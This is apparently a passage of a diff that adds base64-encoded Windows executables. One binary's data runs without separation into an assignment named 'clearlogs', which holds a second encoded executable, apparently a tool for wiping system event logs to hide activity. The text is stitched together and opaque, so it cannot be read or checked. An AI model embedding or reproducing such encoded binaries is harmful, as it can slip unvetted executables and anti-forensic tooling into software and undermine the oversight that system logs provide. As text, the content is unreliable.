+AAAAAAAAAAAAAAAAavtAAGr7QAAAACAAIAAgACAAIAAgACAAIAAgACgAKAAoACgAKAAgACAAIAAg +ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABIABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAA +EAAQAIQAhACEAIQAhACEAIQAhACEAIQAEAAQABAAEAAQABAAEACBAIEAgQCBAIEAgQABAAEAAQAB +AAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAEAAQABAAEAAQABAAggCCAIIAggCCAIIA +AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABAAEAAQABAAIAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAwAsAAAAAAAAAHQAAwAQAAAAAAAAAlgAAwAQA +AAAAAAAAjQAAwAgAAAAAAAAAjgAAwAgAAAAAAAAAjwAAwAgAAAAAAAAAkAAAwAgAAAAAAAAAkQAA +wAgAAAAAAAAAkgAAwAgAAAAAAAAAkwAAwAgAAAAAAAAAAwAAAAcAAAB4AAAACgAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAQIECAAAAACkAwAAYIJ5giEAAAAAAAAApt8AAAAAAAChpQAAAAAAAIGf4PwAAAAAQH6A/AAA +AACoAwAAwaPaoyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQP4AAAAAAAC1AwAAwaPa +oyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQf4AAAAAAAC2AwAAz6LkohoA5aLoolsA +AAAAAAAAAAAAAAAAAAAAAIH+AAAAAAAAQH6h/gAAAABRBQAAUdpe2iAAX9pq2jIAAAAAAAAAAAAA +AAAAAAAAAIHT2N7g+QAAMX6B/gAAAAACAAAAcORAAAgAAABE5EAACQAAABjkQAAKAAAA9ONAABAA +AADI40AAEQAAAJjjQAASAAAAdONAABMAAABI40AAGAAAABDjQAAZAAAA6OJAABoAAACw4kAAGwAA +AHjiQAB4AAAAaOJAAHkAAABY4kAAegAAAEjiQAD8AAAAROJAAP8AAAA04kAAAAAAABCOQAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAMDqQAAABAAAtOpAAAkEAACg6kAACQQAAIzqQAAJBAAAgOpAAAkM +AAB46kAAEwgAAGzqQAAJEAAAaOpAAAQMAABk6kAABBAAAFzqQAAEBAAASOpAAAQMAAA06kAABAgA +ACDqQAAEEAAADOpAAAQEAAAI6kAABAgAAATqQAAEBAAAAOpAAAUEAAD46UAABQQAAPTpQAAGBAAA +7OlAAAYEAADo6UAABwwAAOTpQAAHCAAA4OlAAAcEAADY6UAAEwQAAMjpQAATCAAAxOlAAAgEAADA +6UAACQwAALzpQAAJEAAAuOlAAAkIAACw6UAACQQAAJzpQAAJBAAAkOlAAAkMAACE6UAACRAAAHjp +QAAJGAAAbOlAAAkUAABg6UAACQgAAFTpQAAJBAAASOlAAAkEAABE6UAACRgAAEDpQAAJBAAAPOlA +AAkUAAA46UAACggAADTpQAAKDAAAMOlAAAoEAAAs6UAACwQAACTpQAALBAAAIOlAAAwEAAAc6UAA +DAgAABjpQAAMDAAAEOlAAAwEAAAA6UAADAgAAPDoQAAMDAAA4OhAAAwQAADc6EAADBAAANToQAAH +BAAAxOhAAAcMAAC06EAABwgAAKzoQAAIBAAAqOhAAA4EAACc6EAADgQAAJDoQAAPBAAAgOhAAAkY +AAB86EAADwQAAHjoQAAQBAAAcOhAABAEAABg6EAAEAgAAFzoQAAQCAAAUOhAABEEAABM6EAAEQQA +AEjoQAASBAAAQOhAABIEAAA86EAAEwgAADjoQAATBAAANOhAABQIAAAw6EAAFAQAACToQAAUBAAA +EOhAABQEAAD850AAFAgAAPjnQAAVBAAA8OdAABUEAADk50AAFggAAMznQAAWBAAAyOdAABYEAADE +50AAFggAAMDnQAAZBAAAuOdAABkEAAC050AAGwQAAKznQAAbBAAApOdAAAoEAACU50AACggAAITn +QAAKDAAAgOdAAB0EAAB450AAHQQAAHDnQAAHCAAAbOdAAB8EAABk50AAHwQAAGDnQAAJCAAAXOdA +AAkEAABY50AACQQAAMDqQAAAAAAAUOdAAAEAAABM50AAPQAAAEDnQAA9AAAAOOdAACsAAAA050AA +KwAAADDnQAAgAAAAKOdAACAAAAAk50AANwAAABznQAA3AAAAFOdAACwAAAAQ50AAAgAAAAjnQAAC +AAAABOdAACkAAAD85kAAVgAAAPjmQABWAAAA9OZAACoAAAD46UAAKgAAAOzmQAAtAAAA4OlAADEA +AADo5kAALQAAAODmQAAsAAAAMOlAACIAAAAs6UAAZgEAANjmQABmAQAAIOlAACEAAADQ5kAAIQAA +AMzmQAAsAAAAxOZAADEAAADA5kAAHgAAALDmQAAsAAAAqOZAAB4AAACk5kAAVAMAAJzmQAAfAAAA +kOZAAFQDAACE5kAAVAMAAKjoQAAkAAAAfOZAACQAAAB05kAAYgEAAGzmQABhAQAAaOZAAGEBAAB8 +6EAAYgEAAHjoQAAnAAAAYOZAACcAAABY5kAAUQAAAEzoQABRAAAASOhAAFIAAABQ5kAAUgAAAEzm +QAA0AAAAROZAADQAAAA45kAAHwAAACzmQABAAAAAIOZAAEAAAAA46EAAHwAAADDoQAAvAAAAGOZA +AC8AAAAU5kAAQAAAABDmQABAAAAADOZAADAAAAAE5kAAMAAAAPjlQABfAQAA7OVAAFYAAADg5UAA +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 +MiIBAEQiAQBQIgEAXCIBAHIiAQCCIgEAkCIBAKQiAQC4IgEAyiIBANgiAQDmIgEAAiMBABojAQAy +IwEASiMBAGgjAQB+IwEAjCMBAJgjAQCoIwEAtiMBAMIjAQDUIwEA4iMBAPQjAQACJAEAEiQBAAgi +AQBAJAEAViQBAHAkAQCGJAEAniQBALgkAQDSJAEA3iQBAOgkAQD0JAEAACUBABAlAQAgJQEAMCUB +AEAlAQBUJQEAYiUBAHIlAQCCJQEAlCUBAKYlAQC4JQEAyCUBANYlAQDiJQEA8iUBAAQmAQAAAAAA +iABGb3JtYXRNZXNzYWdlQQAAggFMb2NhbEZyZWUAWQFIZWFwRnJlZQAArgFSYWlzZUV4Y2VwdGlv +bgAAUwFIZWFwQWxsb2MAxwFSdGxVbndpbmQAQgJXaWRlQ2hhclRvTXVsdGlCeXRlAOEAR2V0TGFz +dEVycm9yAABiAEV4aXRQcm9jZXNzAB0CVGVybWluYXRlUHJvY2VzcwAAxABHZXRDdXJyZW50UHJv +Y2VzcwCfAEdldENvbW1hbmRMaW5lQQA3AUdldFZlcnNpb24AAFUBSGVhcENyZWF0ZQAAZAFJbml0 +aWFsaXplQ3JpdGljYWxTZWN0aW9uAEQARGVsZXRlQ3JpdGljYWxTZWN0aW9uAE8ARW50ZXJDcml0 +aWNhbFNlY3Rpb24AAHcBTGVhdmVDcml0aWNhbFNlY3Rpb24AABECU2V0VW5oYW5kbGVkRXhjZXB0 +aW9uRmlsdGVyAMcAR2V0Q3VycmVudFRocmVhZElkAAAiAlRsc1NldFZhbHVlAB8CVGxzQWxsb2MA +AP0BU2V0TGFzdEVycm9yAAAhAlRsc0dldFZhbHVlALgBUmVhZEZpbGUAAPgBU2V0RmlsZVBvaW50 +ZXIAABYAQ2xvc2VIYW5kbGUA+gFTZXRIYW5kbGVDb3VudAAA3ABHZXRGaWxlVHlwZQAWAUdldFN0 +ZEhhbmRsZQAAFAFHZXRTdGFydHVwSW5mb0EAJgJVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAOkA +R2V0TW9kdWxlRmlsZU5hbWVBAACLAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NBAJMBTXVsdGlCeXRl +VG9XaWRlQ2hhcgDQAEdldEVudmlyb25tZW50U3RyaW5ncwCMAEZyZWVFbnZpcm9ubWVudFN0cmlu +Z3NXANIAR2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAmABHZXRDUEluZm8AkgBHZXRBQ1AAAPYAR2V0 +T0VNQ1AAAE8CV3JpdGVGaWxlAGwBSXNCYWRSZWFkUHRyAABvAUlzQmFkV3JpdGVQdHIAaQFJc0Jh +ZENvZGVQdHIAAAYCU2V0U3RkSGFuZGxlAACDAEZsdXNoRmlsZUJ1ZmZlcnMAACsAQ3JlYXRlRmls +ZUEAdQFMQ01hcFN0cmluZ0EAAHYBTENNYXBTdHJpbmdXAAAXAUdldFN0cmluZ1R5cGVBAAAaAUdl +dFN0cmluZ1R5cGVXAAADAUdldFByb2NBZGRyZXNzAAB4AUxvYWRMaWJyYXJ5QQAAXAFIZWFwUmVB +bGxvYwBdAUhlYXBTaXplAADvAVNldEVuZE9mRmlsZQAA4wBHZXRMb2NhbGVJbmZvQQAA5ABHZXRM +b2NhbGVJbmZvVwAAS0VSTkVMMzIuZGxstTDI +MOowIzE2MVYxcjGqMb0x4jEMMkMyVjIWM00zYDPmMx00MDSMNM40FzUoNZI1+DU0NkU2ZDagNrE2 +2TYmNzc3fDf3N/03Pjh3OIo4qDjhOPQ4MDmvOe45AToiOkk6gDqTOkU8WDx6PLM8xjzmPAI9Oj1N +PXE9mz3SPeU9kD7YPus+DD9EP1c/jD/hPwAAACAAAPAAAAAAMDcwVjCRMLAwGjFJMWIxcDEcMioy +fDKrMssy5zIRMy8z5TPwMww0OzRvNI40rzTONA01rTW4Ndw1AzYUNic2OTZVNmQ2jzagNr420zbv +Nhk3Nzd5N4E3pzeyN8434TeTOKM4szjDONk47zj1OP44GjkqOTo5SjlaOXY5fDmFOaE5sTnBOdE5 +5zn9OQM6DDozOjk6SjpbOnU6jDqSOpg60DrgOvA6ADsWOyw7Mjs7O1c7Zzt3O4c7lzuzO7k7wjve +O+47/jsOPCQ8OjxAPEk8ZTx1PIU8lTyuPMQ8yjzQPH89oT2sPb49ADAAAIgAAACzMLgw7jDzMDox +PzGnMawxYDQQNSw1MTVcNWE1hjWiNac1CDYNNmU2gDaTNqA2uzbONts28jYRNyg3NTdMN1k3VDhZ +OKw4sTjFOMo4+zgfOTI5lDmiOb051TkSO5g7rjvPO9s79jsGPBc8IzxbPJA8bD1zPYU92z0LPi8+ +PD5hPgBAAAB0AAAAUTC2MMAwVTH/MZMyzjLYMxk0gjScNKU0ojjAOPQ4Lzk8OWc5djm/Oc85/DkT +Oh86LTr+Oik7OjsCPAw8GDwhPCw8OjxEPFk8bDx0PIo8oDy/PNc88zwCPRs9Kj04PTk+VD4IPyQ/ +QT9gPwAAAFAAAMQAAACRMJwwoTCuMLMwCjEYMR8xJTE4MUAxSTFSMWUxbDFxMX4xgzGeMakxDDIR +MigyPTJDMkgyUzKCMocykTKbMrwywTLHMs0yMjNSM2szcDOCM4kzkTOZM6EzvDPxMxA0KjQxNEg0 +TzRWNHA0ojS4NL80xjTgNBI1MTU+NUQ1STV+NYY1mjWxNbg1yDXNNe419TUINic2RDZLNlI2cDZ3 +Noo2pjYiNz43uDfQN1s4rji4OK45uDlrOow/kT8AAABgAAB8AAAAHDEhMWwycTJsNHE0aDWANRY2 +KDZRNks3XDd4N7s30jeHOAQ5uDnQOVY6YDqZOiY7NjtqO3k7bjyMPJA8lDyYPJw8oDykPKg8rDyw +PBQ9Jj1BPV09Zj17PYQ9lT2bPag9rj09Pkk+Vj5rPlY/aD+EP84/1T8AcAAAvAAAAK8wtjDoMIsx +kjFWMvQyyTXmNf01UDbQN9Q32DfcN+A35DfoN+w38Df0N/g3/DcAOAQ4HDggOCQ4KDgsOGA4ZDho +OGw4cDh0OHg4fDiAOIQ4iDiMOJA4lDiYOJw4oDgcOiI6STpdOpM6mjq5Ouk68zoMOyY7RztwO347 +tzu+O+U76zsEPBc8RzxUPFk8fzyOPKA8sTzSPPE8DT03PUU9bz2FPaQ92z1EPl4+MD84P5U/sD8A +AACAAAAAAQAAijCQMLEwtzBmMYQxqjHdMfYxYTKLMpQymTKfMqoyDDMSM2szrzOSNLM09TT/NBA1 +IDUsNUo1mzXCNdg16TX5NQY2RjZrNrI28jYGNxQ3IjdaN3g3iDeaN7w32jfgN/83DDgROB84KDhO +OFM4Wjh8OMI41TjfOOo49Dj/OAg5IjkpOUg5TDlQOVQ5WDl0OYE5hjmMOZE5kTqgOrU62TrxOvo6 +DTsaOyM7STtWO6I7sDvxOyQ8WTx4PIg8kDyuPMc81jzcPOg8+jwXPR09JT0tPTI9Pj1+PZE9nD2h +PcI94j39PRw+IT6cPqE+vj4TP3E/tz/OP94/AAAAkAAAlAAAABkwQjBKMKgwuTDSMPIwATEQMVgx +aDGIMbEx9jEPMlcyfjKZMscy0zITMxgzHDMgMyQzeTOsM7AztDO4M7wzHzQ5NEk0hDSONOg0ADWY +NU82ejaWNqQ3GDgfOBU5tjnGOew59zn9OUk6eDt8O4A7hDuIO8I7DTwTPCE8Mjw6PD48QzxRPGI8 +eDyGPAAAAKAAAOAAAAA5M0AzSzNfM3MzhzOZM6cztTPJM88z1jPeM+Uz9TMHNBg0HjQmNCw0NTQ6 +NEM0UDRZNGE0bzR9NI40lDSaNKo0sjTINNs05DQHNRA1KDU3NUE1ojXuNfc1AjYONhQ2IzY0Njs2 +QzZMNlI2XDZgNmY2dDaFNp02PTivOLs4wjjKOFU5XTl+OSA6ajpwOnY6fjqNOpQ6mzqrOgw7EjsY +Ox07Kzs7O0A7JjxCPFI8cDyhPMM8/DwNPSE9Qj5RPlo+eT6GPp4+pz7APsU+8D4GPyE/YD96P68/ ++j8AsAAA7AAAABgwOTClMLYwvjDMMN4w6DDyMAgxDjE1MVAxbjG1Md0x/zFkMnYyfjKbMqMyvjLD +MtYy+jIRMygzVDNqM5cznjOkM68ztTO9M8YzzjPTM9sz4DPyM/wzFDRgNGY0gDSTNKY0sDS9Nd81 +ZjYvN1k3aTeKN7E34jfxNxI4KjgvOFQ4azh/OLA4zDj0OBI5ITlCOVo5XzmEOZs5rznnOQo6NTpe +OqU6rjoAO0k7UDtlO2s7lTubO6U7qzu1O7s7RjxLPGw8cjzYPNw84DzkPOg87DzwPPQ8JT1lPfU9 +Hz41PlQ+iz4AAADAAAAUAAAAgjCpMAAxCTFpMQAAAOAAAIAAAAAAMQQxLDEwMTwxQDFQMVgxXDFk +MWgxdDF4MQg1EDUUNSA1KDUsNXw8gDyUPJg8oDy8PNw87Dz0PBQ9JD0wPTg9aD18PYg9kD2sPbQ9 +0D3cPeQ98D34PRQ+MD48PkQ+UD5YPnQ+kD6cPqQ+sD64PtQ+8D78PgQ/AAAA8AAAWAAAAAQwEDAU +MCAwODBIMCw0MDQ4NFA00DXYNaw4xDjkOPQ4BDmIOZg5oDmkOag5rDmwObQ5uDm8OcA5xDnIOcw5 +0DnUOdg53DkwOzQ7YDtkOwAAAAABACACAAAcMCQwLDA0MDwwRDBMMFQwXDBkMGwwdDB8MIQwjDCU +MJwwpDD4MAAxCDEQMRgxIDEoMTAxODFAMUgxUDFYMWAxaDFwMXgxgDGIMZAxmDGgMagxsDG4McAx +yDHQMdgx4DHoMfAx+DEAMggyEDIYMiAyKDIwMjgyQDJIMlAyWDJgMmgycDJ4MoAyiDKQMpgyoDKo +MrAyuDLAMsgy0DLYMuAy6DLwMvgyADMIMxAzGDMgMygzMDM4M0AzSDNQM1gzYDNoM3AzeDOAM4gz +kDOYM6AzqDOwM7gzwDPIM9Az2DPgM+gz8DP4MwA0CDQQNBg0IDQoNDA0ODRANEg0UDRYNGA0aDRw +NHg0gDSINJA0mDSgNKg0sDS4NMA0yDTQNNg04DToNPA0+DQANQg1EDUYNSA1KDUwNTg1QDVINVA1 +WDVgNWg1cDV4NYA1iDWQNZg1oDWoNbA1uDXANcg10DXYNeA16DXwNfg1ADYINhA2GDYgNig2MDY4 +NkA2SDZQNlg2YDZoNnA2eDaANog2kDaYNqA2qDawNrg2wDbwOPQ4+Dj8OAA5BDkwOTQ5ODk8OUA5 +RDlIOUw5UDlUOVg5XDlgOWQ5aDlsOXA5dDl4OXw5gDmEOYg5jDmQOZQ5mDmcOaA5pDmoOaw5sDm0 +Obg5vDnAOcQ5yDnMOdA51DnYOdw58Dn0Ofg5/DkAOgQ6CDoMOhA6FDogOuA65Doclearlogs = "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 